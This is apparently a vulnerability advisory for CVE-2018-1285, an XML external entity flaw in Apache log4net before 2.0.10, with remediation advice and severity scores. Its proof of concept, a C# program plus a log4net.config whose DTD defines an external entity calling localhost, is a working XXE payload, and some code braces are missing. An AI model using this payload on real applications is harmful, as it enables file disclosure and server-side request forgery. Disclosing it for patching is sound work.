We found results for “


Date: May 11, 2020


Apache log4net is an open-source utility that allows developers to output log statements to a wide range of logging targets flexibly and fast. The tool is configured using an XML configuration file, which is easily readable and updateable. Its affected versions allow an attacker to transmit tainted XML data via configuration files and harm the application.


The CVE-2018-1285 vulnerability exists because of how log4net parses XML configuration files in applications where it is permitted to undertake XML external entity processing. If XML external entities when parsing configuration files are not disabled, an intruder could leverage this vector to stage an attack.
An attacker could make malicious changes to an XML configuration file, which is defined using the Document Type Definition (DTD) structural style, making the XML parser to embed incorrect content into its output. As a result, the attacker could force the processing application to expose sensitive data contained in local files, initiate a denial of service, or cause other system impacts.
This type of attack is called XXE attacks, which is the shortened version for the term "XML eXternal Entities" attacks.

PoC Details

.NET Framework 4
Log4net 2.0.8
Python 3.9.1.

Below is a simple .NET framework application which uses Log4net to log an informative message.
The application reads from log4net.config file, which contains a malicious XXE which sends an http request to an arbitrary address (for demonstration purposes it will be "localhost" at port 8000).
Set up a simple python server serving port 8000 at "localhost".
Now build and run the application, and you will see a new request received at the python server side, proving SSRF through XXE.

PoC Code

// Program.cs - the application
using System.IO;
using System.Reflection;
using log4net;
using log4net.Config;

namespace CVE_2018_1285
    class Program
        private static readonly ILog log = LogManager.GetLogger(typeof(Program));
        static void Main(string[] args)
            var logRepository = LogManager.GetRepository(Assembly.GetEntryAssembly());
            XmlConfigurator.Configure(logRepository, new FileInfo("log4net.config"));


// log4net.config content:
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "http://localhost:8000/">

// for simple python server, on cmd:
> python -m http.server

// When running the built application, the following request is logged at the server side:
::1 - - [24/Aug/2021 10:18:48] "GET / HTTP/1.1" 200

Affected Environments

Apache log4net versions before 2.0.10


Do not permit arbitrary configurations files to be specified from untrusted users Disable DTDs completely


Update to log4net version 2.0.10 or higher

Language: C#

Good to know:


Improper Restriction of XML External Entity Reference ('XXE')


Upgrade Version

Upgrade to version log4net - 2.0.10

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Low
Authentication (AU): None
Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial
Additional information: